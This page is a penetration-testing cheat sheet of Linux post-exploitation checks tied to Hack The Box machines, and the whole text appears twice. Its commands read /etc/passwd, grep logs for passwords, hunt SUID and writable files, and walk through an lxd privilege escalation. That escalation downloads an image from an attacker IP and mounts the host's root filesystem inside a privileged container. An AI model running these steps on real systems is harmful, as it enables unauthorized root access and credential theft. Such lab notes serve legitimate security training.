Post Exploit Checks

General Enumeration

Know if the environment is a real host

ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
hostname

Know the permissions of the user

sudo -l
id

Know the users

cat /etc/passwd

Check for .htaccess file
/etc/apache2/sites-enabled/*
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
Application Specific Configs : wp-config, settings.php etc..,

Groups Exploitation

4(adm)

The adm group members can view the log files

cd /var/log
grep -EnRi password .

Machine:

Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620
Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780

116(lxd)

The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment

# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine

Files Enumeration

Find suid binaries

find / -perm /4000 -ls 2>/dev/null

Find Writeable files

find / -type f -writable 2>/dev/null | grep -v proc

Find files owned by the user (group specific)

# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null

Locations to check

ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

Crontabs

crontab -l
cat /etc/crontab

Enumerate processes with pspy

Network Enumeration

Know the network adapters ( might be communicating internally )

ip a

Open Ports and services

netstat -antp
# look for unusal services running interally or mysql service

Process Enumeration

Enumerate the services that are running

ps aux

Get more information about the process (like the passed arguments etc.., it might contain passwords )

# know the process id from ps aux
cat /proc/<processid>/cmd

Web Directories

Check the web directories for passwords

/var/www/*

MYSQL

If MYSQL is running as root in the machine check for priv esc via library
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library
https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
The \G option in the sql query of the mysql prints the information in a prettier format

# Connecting to mysql
mysql -u root -p 
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"

PreviousPort Forwarding NextPivoting ( ProxyChains )

Last updated 2 years ago

Was this helpful?

Post Exploit Checks

General Enumeration

Know if the environment is a real host

ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
hostname

Know the permissions of the user

sudo -l
id

Know the users

cat /etc/passwd

Check for .htaccess file
/etc/apache2/sites-enabled/*
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
Application Specific Configs : wp-config, settings.php etc..,

Groups Exploitation

4(adm)

The adm group members can view the log files

cd /var/log
grep -EnRi password .

Machine:

Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620
Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780

116(lxd)

The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment

# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine

Files Enumeration

Find suid binaries

find / -perm /4000 -ls 2>/dev/null

Find Writeable files

find / -type f -writable 2>/dev/null | grep -v proc

Find files owned by the user (group specific)

# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null

Locations to check

ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

Crontabs

crontab -l
cat /etc/crontab

Enumerate processes with pspy

Network Enumeration

Know the network adapters ( might be communicating internally )

ip a

Open Ports and services

netstat -antp
# look for unusal services running interally or mysql service

Process Enumeration

Enumerate the services that are running

ps aux

Get more information about the process (like the passed arguments etc.., it might contain passwords )

# know the process id from ps aux
cat /proc/<processid>/cmd

Web Directories

Check the web directories for passwords

/var/www/*

MYSQL

If MYSQL is running as root in the machine check for priv esc via library
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library
https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
The \G option in the sql query of the mysql prints the information in a prettier format

# Connecting to mysql
mysql -u root -p 
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"

PreviousPort Forwarding NextPivoting ( ProxyChains )

Last updated 2 years ago

Was this helpful?